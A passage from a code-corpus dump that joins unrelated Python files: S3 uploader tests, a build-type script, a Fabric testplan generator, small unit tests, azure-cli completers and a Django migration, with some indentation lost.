"without_scaled_size_and_with_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
None,
"us-east-3",
),
(
"with_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
),
(
"with_scaled_size_and_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
"us-east-3",
),
]
)
def test_cover_image_url(
self,
name,
buckets,
data_source_name,
identifier,
filename,
expected_result,
scaled_size=None,
region=None,
):
# identifier = self._identifier(foreign_id="ABOOK")
# buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'}
# uploader = self._uploader(**buckets)
# m = uploader.cover_image_url
#
# unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
# identifier = self._identifier(foreign_id="ABOOK")
# eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename',
# m(unglueit, identifier, "filename", scaled_size=601))
# Arrange
data_source = DataSource.lookup(self._db, data_source_name)
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.cover_image_url(
data_source, identifier, filename, scaled_size=scaled_size
)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_s3_bucket_and_end_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 1, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc",
),
(
"with_s3_bucket_and_end_time_and_start_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_s3_bucket_and_end_time_and_start_time_and_custom_region",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
"us-east-2",
),
(
"with_http_bucket_and_end_time_and_start_time",
"http://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_https_bucket_and_end_time_and_start_time",
"https://marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
]
)
def test_marc_file_url(
self,
name,
bucket,
library_name,
lane_name,
end_time,
expected_result,
start_time=None,
region=None,
):
# Arrange
library = self._library(short_name=library_name)
lane = self._lane(display_name=lane_name)
buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket}
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.marc_file_url(library, lane, end_time, start_time)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_path_style_request_without_region",
"https://s3.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_path_style_request_with_region",
"https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_global_endpoint",
"https://bucket.s3.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dashed_region",
"https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"s3_virtual_hosted_style_request_with_dotted_region",
"https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg",
("bucket", "directory/filename.jpg"),
),
(
"http_url",
"http://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"https_url",
"https://book-covers.nypl.org/directory/filename.jpg",
("book-covers.nypl.org", "directory/filename.jpg"),
),
(
"http_url_with_escaped_symbols",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename with spaces!.jpg"),
),
(
"http_url_with_escaped_symbols_but_unquote_set_to_false",
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg",
("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"),
False,
),
]
)
def test_split_url(self, name, url, expected_result, unquote=True):
# Arrange
s3_uploader = self._create_s3_uploader()
# Act
result = s3_uploader.split_url(url, unquote)
# Assert
assert result == expected_result
def test_mirror_one(self):
edition, pool = self._edition(with_license_pool=True)
original_cover_location = "http://example.com/a-cover.png"
content = open(self.sample_cover_path("test-book-cover.png"), "rb").read()
cover, ignore = pool.add_link(
Hyperlink.IMAGE,
original_cover_location,
edition.data_source,
Representation.PNG_MEDIA_TYPE,
content=content,
)
cover_rep = cover.resource.representation
assert None == cover_rep.mirrored_at
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
assert None == epub_rep.mirrored_at
s3 = self._create_s3_uploader(client_class=MockS3Client)
# Mock final_mirror_url so we can verify that it's called with
# the right arguments
def mock_final_mirror_url(bucket, key):
return "final_mirror_url was called with bucket %s, key %s" % (bucket, key)
s3.final_mirror_url = mock_final_mirror_url
book_url = "http://books-go/here.epub"
cover_url = "http://s3.amazonaws.com/covers-go/here.png"
s3.mirror_one(cover.resource.representation, cover_url)
s3.mirror_one(epub.resource.representation, book_url)
[
[data1, bucket1, key1, args1, ignore1],
[data2, bucket2, key2, args2, ignore2],
] = s3.client.uploads
# Both representations have had .mirror_url set and been
# mirrored to those URLs.
assert data1.startswith(b"\x89")
assert "covers-go" == bucket1
assert "here.png" == key1
assert Representation.PNG_MEDIA_TYPE == args1["ContentType"]
assert (utc_now() - cover_rep.mirrored_at).seconds < 10
assert b"i'm an epub" == data2
assert "books-go" == bucket2
assert "here.epub" == key2
assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"]
# In both cases, mirror_url was set to the result of final_mirror_url.
assert (
"final_mirror_url was called with bucket books-go, key here.epub"
== epub_rep.mirror_url
)
assert (
"final_mirror_url was called with bucket covers-go, key here.png"
== cover_rep.mirror_url
)
# mirrored-at was set when the representation was 'mirrored'
for rep in epub_rep, cover_rep:
assert (utc_now() - rep.mirrored_at).seconds < 10
def test_mirror_failure(self):
edition, pool = self._edition(with_license_pool=True)
original_epub_location = "https://books.com/a-book.epub"
epub, ignore = pool.add_link(
Hyperlink.OPEN_ACCESS_DOWNLOAD,
original_epub_location,
edition.data_source,
Representation.EPUB_MEDIA_TYPE,
content="i'm an epub",
)
epub_rep = epub.resource.representation
uploader = self._create_s3_uploader(MockS3Client)
# A network failure is treated as a transient error.
uploader.client.fail_with = BotoCoreError()
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# An S3 credential failure is treated as a transient error.
response = dict(
Error=dict(
Code=401,
Message="Bad credentials",
)
)
uploader.client.fail_with = ClientError(response, "SomeOperation")
uploader.mirror_one(epub_rep, self._url)
assert None == epub_rep.mirrored_at
assert None == epub_rep.mirror_exception
# Because the file was not successfully uploaded,
# final_mirror_url was never called and mirror_url was not set.
assert None == epub_rep.mirror_url
# A bug in the code is not treated as a transient error --
# the exception propagates through.
uploader.client.fail_with = Exception("crash!")
pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url)
def test_svg_mirroring(self):
edition, pool = self._edition(with_license_pool=True)
original = self._url
# Create an SVG cover for the book.
svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50">
<ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/>
</svg>"""
hyperlink, ignore = pool.add_link(
Hyperlink.IMAGE,
original,
edition.data_source,
Representation.SVG_MEDIA_TYPE,
content=svg,
)
# 'Upload' it to S3.
s3 = self._create_s3_uploader(MockS3Client)
s3.mirror_one(hyperlink.resource.representation, self._url)
[[data, bucket, key, args, ignore]] = s3.client.uploads
assert Representation.SVG_MEDIA_TYPE == args["ContentType"]
assert b"svg" in data
assert b"PNG" not in data
def test_multipart_upload(self):
class MockMultipartS3Upload(MultipartS3Upload):
completed = None
aborted = None
def __init__(self, uploader, representation, mirror_to):
self.parts = []
MockMultipartS3Upload.completed = False
MockMultipartS3Upload.aborted = False
def upload_part(self, content):
self.parts.append(content)
def complete(self):
MockMultipartS3Upload.completed = True
def abort(self):
MockMultipartS3Upload.aborted = True
rep, ignore = create(
self._db,
Representation,
url="http://books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
s3 = self._create_s3_uploader(MockS3Client)
# Successful upload
with s3.multipart_upload(
rep, rep.url, upload_class=MockMultipartS3Upload
) as upload:
assert [] == upload.parts
assert False == upload.completed
assert False == upload.aborted
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert ["Part 1", "Part 2"] == upload.parts
assert True == MockMultipartS3Upload.completed
assert False == MockMultipartS3Upload.aborted
assert None == rep.mirror_exception
class FailingMultipartS3Upload(MockMultipartS3Upload):
def upload_part(self, content):
raise Exception("Error!")
# Failed during upload
with s3.multipart_upload(
rep, rep.url, upload_class=FailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
class AnotherFailingMultipartS3Upload(MockMultipartS3Upload):
def complete(self):
raise Exception("Error!")
rep.mirror_exception = None
# Failed during completion
with s3.multipart_upload(
rep, rep.url, upload_class=AnotherFailingMultipartS3Upload
) as upload:
upload.upload_part("Part 1")
assert False == MockMultipartS3Upload.completed
assert True == MockMultipartS3Upload.aborted
assert "Error!" == rep.mirror_exception
@parameterized.expand(
[
(
"default_expiration_parameter",
None,
int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION),
),
(
"empty_expiration_parameter",
{S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100},
100,
),
]
)
def test_sign_url(self, name, expiration_settings, expected_expiration):
# Arrange
region = "us-east-1"
bucket = "bucket"
filename = "filename"
url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename)
expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S"
settings = expiration_settings if expiration_settings else {}
s3_uploader = self._create_s3_uploader(region=region, **settings)
s3_uploader.split_url = MagicMock(return_value=(bucket, filename))
s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url)
# Act
result = s3_uploader.sign_url(url)
# Assert
assert result == expected_url
s3_uploader.split_url.assert_called_once_with(url)
s3_uploader.client.generate_presigned_url.assert_called_once_with(
"get_object",
ExpiresIn=expected_expiration,
Params={"Bucket": bucket, "Key": filename},
)
class TestMultiPartS3Upload(S3UploaderTest):
def _representation(self):
rep, ignore = create(
self._db,
Representation,
url="http://bucket/books.mrc",
media_type=Representation.MARC_MEDIA_TYPE,
)
return rep
def test_init(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
assert uploader == upload.uploader
assert rep == upload.representation
assert "bucket" == upload.bucket
assert "books.mrc" == upload.filename
assert 1 == upload.part_number
assert [] == upload.parts
assert 1 == upload.upload.get("UploadId")
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url)
def test_upload_part(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
assert [
{
"Body": "Part 1",
"UploadId": 1,
"PartNumber": 1,
"Bucket": "bucket",
"Key": "books.mrc",
},
{
"Body": "Part 2",
"UploadId": 1,
"PartNumber": 2,
"Bucket": "bucket",
"Key": "books.mrc",
},
] == uploader.client.parts
assert 3 == upload.part_number
assert [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
] == upload.parts
uploader.client.fail_with = Exception("Error!")
pytest.raises(Exception, upload.upload_part, "Part 3")
def test_complete(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.complete()
assert [
{
"Bucket": "bucket",
"Key": "books.mrc",
"UploadId": 1,
"MultipartUpload": {
"Parts": [
{"ETag": "etag", "PartNumber": 1},
{"ETag": "etag", "PartNumber": 2},
],
},
}
] == uploader.client.uploads
def test_abort(self):
uploader = self._create_s3_uploader(MockS3Client)
rep = self._representation()
upload = MultipartS3Upload(uploader, rep, rep.url)
upload.upload_part("Part 1")
upload.upload_part("Part 2")
upload.abort()
assert [] == uploader.client.parts
@pytest.mark.minio
class TestS3UploaderIntegration(S3UploaderIntegrationTest):
@parameterized.expand(
[
(
"using_s3_uploader_and_open_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
),
(
"using_s3_uploader_and_protected_access_bucket",
functools.partial(
S3Uploader,
host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST,
),
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
),
(
"using_minio_uploader_and_open_access_bucket",
MinIOUploader,
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY,
"test-bucket",
True,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
(
"using_minio_uploader_and_protected_access_bucket",
MinIOUploader,
S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY,
"test-bucket",
False,
{
MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
},
),
]
)
def test_mirror(
self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None
):
# Arrange
book_title = "1234567890"
book_content = "1234567890"
identifier = Identifier(type=Identifier.ISBN, identifier=book_title)
representation = Representation(
content=book_content, media_type=Representation.EPUB_MEDIA_TYPE
)
buckets = {
bucket_type: bucket_name,
}
if settings:
settings.update(buckets)
else:
settings = buckets
s3_uploader = self._create_s3_uploader(
uploader_class=uploader_class, **settings
)
self.minio_s3_client.create_bucket(Bucket=bucket_name)
# Act
book_url = s3_uploader.book_url(identifier, open_access=open_access)
s3_uploader.mirror_one(representation, book_url)
# Assert
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
assert "Contents" in response
assert len(response["Contents"]) == 1
[object] = response["Contents"]
assert object["Key"] == "ISBN/{0}.epub".format(book_title)
| 1.953125 | 2 |
lbry/scripts/set_build.py | vanshdevgan/lbry-sdk | 0 | 3405 | """Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
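# Tag-to-build mapping implemented below:
#   no TRAVIS_TAG              -> "qa"
#   vX.Y.ZrcN (e.g. v1.2.3rc1) -> "rc"
#   vX.Y.Z    (e.g. v1.2.3)    -> "release"
#   anything else              -> "qa"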
def get_build_type(travis_tag=None):
    if not travis_tag:
        return "qa"
    log.debug("getting build type for tag: \"%s\"", travis_tag)
    if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
        return 'rc'
    elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
        return 'release'
    return 'qa'
def main():
    root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
    build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
    log.debug("configuring build type file: %s", build_type_path)
    travis_commit = os.environ['TRAVIS_COMMIT'][:6]
    build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
    log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
    with open(build_type_path, 'w') as f:
        f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
    sys.exit(main())
| 2.234375 | 2 |
backend/jenkins/pipelines/ansible/utils/testplan_gen.py | gbl1124/hfrd | 5 | 3406 | <gh_stars>1-10
#!/usr/bin/python
import yaml
import os
import ast
import sys
from collections import OrderedDict
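# This script reads the per-organization connection profiles under
# <work_dir>/keyfiles/<Org>/connection.yml, collects orderers, peers and anchor
# peers, and renders them into the testplan template, writing the result to
# <work_dir>/testplan_example.yml.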
curr_dir = os.getcwd()
work_dir = sys.argv[1]
network_type = sys.argv[2]
testplan_dict = {}
testplan_dict["name"] = "System performance test"
testplan_dict["description"] = "This test is to create as much chaincode computation load as possible"
testplan_dict["runid"] = "RUNID_HERE"
if network_type == "ibp":
testplan_dict["networkid"] = sys.argv[3]
testplan_dict["collectFabricMetrics"] = False
testplan_dict["storageclass"] = "default"
testplan_dict["saveLog"] = False
testplan_dict["continueAfterFail"] = True
testplan_dict["tests"] = []
testplan_dict["peernodeAlias"] =[]
if os.path.exists(work_dir) != True:
print 'certs keyfiles directory does not exist'
exit(1)
# Load template file
with open(curr_dir + "/templates/testplan_template.yml", 'r') as stream:
template = yaml.load(stream)
channel_create = template["CHANNEL_CREATE"]
# channel_join = template["CHANNEL_JOIN"]
chaincode_install = template["CHAINCODE_INSTALL"]
chaincode_instantiate = template["CHAINCODE_INSTANTIATE"]
chaincode_invoke = template["CHAINCODE_INVOKE"]
execute_command = template["EXECUTE_COMMAND"]
connectionProfile = {}
org_list = []
org_list_lowercase = []
orderer_list = []
peer_list = []
org_peers_dict = {}
org_anchor_dict ={}
allAnchor_list =[]
# Load connection profile
for orgName in os.listdir(work_dir + '/keyfiles'):
if os.path.isfile(work_dir + '/keyfiles/' + orgName + '/connection.yml'):
with open(work_dir + '/keyfiles/' + orgName + '/connection.yml', 'r') as stream:
connectionProfile = yaml.load(stream)
if connectionProfile["orderers"] is None:
continue
orderer_list = orderer_list + connectionProfile["orderers"].keys()
if (connectionProfile["organizations"][orgName.lower()]["peers"] != None):
org_list.append(orgName)
org_list_lowercase.append(orgName.lower())
org_peers_dict[orgName] = connectionProfile["organizations"][orgName.lower(
)]["peers"]
peer_list = peer_list + \
connectionProfile["organizations"][orgName.lower(
)]["peers"]
org_anchor_dict[orgName] = sorted(
connectionProfile["organizations"][orgName.lower(
)]["peers"])[0]
# When there is only peer or orderer, we skip tests.
if len(orderer_list) == 0 or len(peer_list) == 0:
outputfile =open(work_dir + '/testplan_example.yml','w')
outputfile.write("")
outputfile.close()
exit(0)
orderer_list = list(OrderedDict.fromkeys(orderer_list))
peer_list = list(OrderedDict.fromkeys(peer_list))
for orgName in org_list :
tempOrgAnchorObj={}
tempOrgAnchorObj[orgName+"Anchor"] = org_anchor_dict[orgName]
testplan_dict["peernodeAlias"].append(tempOrgAnchorObj)
tempOrgPeersObj={}
tempOrgPeersObj[orgName+"Peers"] = ','.join(org_peers_dict[orgName])
testplan_dict["peernodeAlias"].append(tempOrgPeersObj)
allAnchor_list.append(org_anchor_dict[orgName])
testplan_dict["peernodeAlias"].append({"allAnchors":','.join(allAnchor_list)})
testplan_dict["peernodeAlias"].append({"allPeers":','.join(peer_list)})
print 'org list: '
print org_list_lowercase
print 'orderer_list: '
print orderer_list
print 'peer_list: '
print peer_list
print 'allAnchor_list'
print allAnchor_list
# CREATE_CHANNEL
channel_create["parameters"]["connectionProfile"] = org_list[0]
if network_type == 'cello':
channel_create["parameters"]["channelConsortium"] = 'FabricConsortium'
else:
channel_create["parameters"]["channelConsortium"] = 'SampleConsortium'
channel_create["parameters"]["channelOrgs"] = ','.join(org_list_lowercase)
channel_create["parameters"]["ordererName"] = orderer_list[0]
testplan_dict["tests"].append(channel_create)
# JOIN_CHANNEL and INSTALL_CHAINCODE
join_list = []
install_list = []
for org in org_list:
channel_join = template["CHANNEL_JOIN"]
channel_join["parameters"]["connectionProfile"] = org
channel_join["parameters"]["peers"] = ','.join(org_peers_dict[org])
channel_join["parameters"]["ordererName"] = orderer_list[0]
join_list.append(str(channel_join))
# CHAINCODE_INSTALL
chaincode_install["parameters"]["connectionProfile"] = org
chaincode_install["parameters"]["peers"] = ','.join(org_peers_dict[org])
install_list.append(str(chaincode_install))
for join_org in join_list:
join_item = ast.literal_eval(join_org)
testplan_dict["tests"].append(join_item)
for install_org in install_list:
install_item = ast.literal_eval(install_org)
testplan_dict["tests"].append(install_item)
# CHAINCODE_INSTANTIATE
chaincode_instantiate["parameters"]["connectionProfile"] = org_list[0]
chaincode_instantiate["parameters"]["peers"] = ','.join(peer_list)
# CHAINCODE_INVOKE
# Invoke with fixed transaction count : 100
chaincode_invoke["iterationCount"] = '100'
chaincode_invoke["parameters"]["connectionProfile"] = org_list[0]
chaincode_invoke["parameters"]["peers"] = ','.join(peer_list)
chaincoode_invoke_count = str(chaincode_invoke)
# Invoke with fixed running duration : 0 hour 10 minutes 0 second.
# And enable running tests parallel by setting waitUntilFinish to true
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["waitUntilFinish"] = False
chaincoode_invoke_time = str(chaincode_invoke)
# Invoke with fixed running duration : 0 hour 10 minutes 0 second
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["parameters"]["peers"] = peer_list[0]
chaincoode_invoke_parallel = str(chaincode_invoke)
testplan_dict["tests"].append(chaincode_instantiate)
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_count))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_time))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_parallel))
# Execute command with default images
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))
# Execute command with customized image
execute_command["name"] = "execute-command-with-customized-image"
execute_command["container"] = "user/ownimage"
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))
connYamlStr= yaml.dump(testplan_dict,default_flow_style=False)
tempstr= connYamlStr
for orgName in org_list :
tempstr = tempstr.replace(orgName+"Anchor:",orgName+"Anchor: &"+orgName+"Anchor")
tempstr = tempstr.replace(orgName+"Peers:",orgName+"Peers: &"+orgName+"Peers")
tempstr = tempstr.replace("allAnchors:","allAnchors: &allAnchors")
tempstr = tempstr.replace("allPeers:","allPeers: &allPeers")
tempstr = tempstr.replace("runid:","runid: &runid")
if network_type == "ibp":
tempstr = tempstr.replace("networkid:","networkid: &networkid")
# Dump testplan file
outputfile =open(work_dir + '/testplan_example.yml','w')
outputfile.write(tempstr)
outputfile.close()
| 1.960938 | 2 |
dblib/test_lib.py | cyber-fighters/dblib | 0 | 3407 | """Collection of tests."""
import pytest
import dblib.lib
f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.')
f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.')
f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.')
def test_add_remove():
    """Test function."""
    db = dblib.lib.BackyardDB()
    # regular cases
    db.add(f0)
    assert f0 in db.findings
    assert len(db.findings) == 1
    db.add(f1)
    assert f1 in db.findings
    assert len(db.findings) == 2
    db.add(f2)
    assert f2 in db.findings
    assert len(db.findings) == 3
    db.add(None)
    assert len(db.findings) == 3
    db.remove(f1)
    assert f1 not in db.findings
    assert len(db.findings) == 2
    # test exceptions
    with pytest.raises(TypeError):
        db.add(1)
def test_update():
    """Test function."""
    db = dblib.lib.BackyardDB()
    db.add(f0)
    db.add(f1)
    db.update(f1, f2)
    assert f2 in db.findings
    assert len(db.findings) == 2
| 2.78125 | 3 |
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py | YuanyuanNi/azure-cli | 3,287 | 3408 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
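# These completers are attached to command arguments at registration time, typically
# with something like c.argument('name', completer=get_policy_remediation_completion_list)
# in the module's _params.py (the exact wiring is an assumption; it is not shown here).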
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
    client = cf_policy_insights(cmd.cli_ctx)
    sub = get_subscription_id(cmd.cli_ctx)
    rg = getattr(namespace, 'resource_group_name', None)
    management_group = getattr(namespace, 'management_group_name', None)
    if rg:
        result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
    elif management_group:
        result = client.remediations.list_for_management_group(management_group_id=management_group)
    else:
        result = client.remediations.list_for_subscription(subscription_id=sub)
    return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
    client = cf_policy_insights(cmd.cli_ctx).policy_metadata
    from azure.mgmt.policyinsights.models import QueryOptions
    query_options = QueryOptions(top=2000)
    return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| 1.828125 | 2 |
hordak/migrations/0011_auto_20170225_2222.py | CodeBrew-LTD/django-hordak | 187 | 3409 | <reponame>CodeBrew-LTD/django-hordak
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-25 22:22
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_smalluuid.models
class Migration(migrations.Migration):
dependencies = [("hordak", "0010_auto_20161216_1202")]
operations = [
migrations.CreateModel(
name="TransactionImport",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"uuid",
django_smalluuid.models.SmallUUIDField(
default=django_smalluuid.models.UUIDDefault(), editable=False, unique=True
),
),
(
"timestamp",
models.DateTimeField(default=django.utils.timezone.now, editable=False),
),
(
"has_headings",
models.BooleanField(
default=True, verbose_name="First line of file contains headings"
),
),
(
"file",
models.FileField(
upload_to="transaction_imports", verbose_name="CSV file to import"
),
),
(
"state",
models.CharField(
choices=[
("pending", "Pending"),
("uploaded", "Uploaded, ready to import"),
("done", "Import complete"),
],
default="pending",
max_length=20,
),
),
(
"date_format",
models.CharField(
choices=[
("%d-%m-%Y", "dd-mm-yyyy"),
("%d/%m/%Y", "dd/mm/yyyy"),
("%d.%m.%Y", "dd.mm.yyyy"),
("%d-%Y-%m", "dd-yyyy-mm"),
("%d/%Y/%m", "dd/yyyy/mm"),
("%d.%Y.%m", "dd.yyyy.mm"),
("%m-%d-%Y", "mm-dd-yyyy"),
("%m/%d/%Y", "mm/dd/yyyy"),
("%m.%d.%Y", "mm.dd.yyyy"),
("%m-%Y-%d", "mm-yyyy-dd"),
("%m/%Y/%d", "mm/yyyy/dd"),
("%m.%Y.%d", "mm.yyyy.dd"),
("%Y-%d-%m", "yyyy-dd-mm"),
("%Y/%d/%m", "yyyy/dd/mm"),
("%Y.%d.%m", "yyyy.dd.mm"),
("%Y-%m-%d", "yyyy-mm-dd"),
("%Y/%m/%d", "yyyy/mm/dd"),
("%Y.%m.%d", "yyyy.mm.dd"),
("%d-%m-%y", "dd-mm-yy"),
("%d/%m/%y", "dd/mm/yy"),
("%d.%m.%y", "dd.mm.yy"),
("%d-%y-%m", "dd-yy-mm"),
("%d/%y/%m", "dd/yy/mm"),
("%d.%y.%m", "dd.yy.mm"),
("%m-%d-%y", "mm-dd-yy"),
("%m/%d/%y", "mm/dd/yy"),
("%m.%d.%y", "mm.dd.yy"),
("%m-%y-%d", "mm-yy-dd"),
("%m/%y/%d", "mm/yy/dd"),
("%m.%y.%d", "mm.yy.dd"),
("%y-%d-%m", "yy-dd-mm"),
("%y/%d/%m", "yy/dd/mm"),
("%y.%d.%m", "yy.dd.mm"),
("%y-%m-%d", "yy-mm-dd"),
("%y/%m/%d", "yy/mm/dd"),
("%y.%m.%d", "yy.mm.dd"),
],
default="%d-%m-%Y",
max_length=50,
),
),
(
"hordak_import",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="hordak.StatementImport"
),
),
],
),
migrations.CreateModel(
name="TransactionImportColumn",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("column_number", models.PositiveSmallIntegerField()),
(
"column_heading",
models.CharField(blank=True, default="", max_length=100, verbose_name="Column"),
),
(
"to_field",
models.CharField(
blank=True,
choices=[
(None, "-- Do not import --"),
("date", "Date"),
("amount", "Amount"),
("amount_out", "Amount (money in only)"),
("amount_in", "Amount (money out only)"),
("description", "Description / Notes"),
],
default=None,
max_length=20,
null=True,
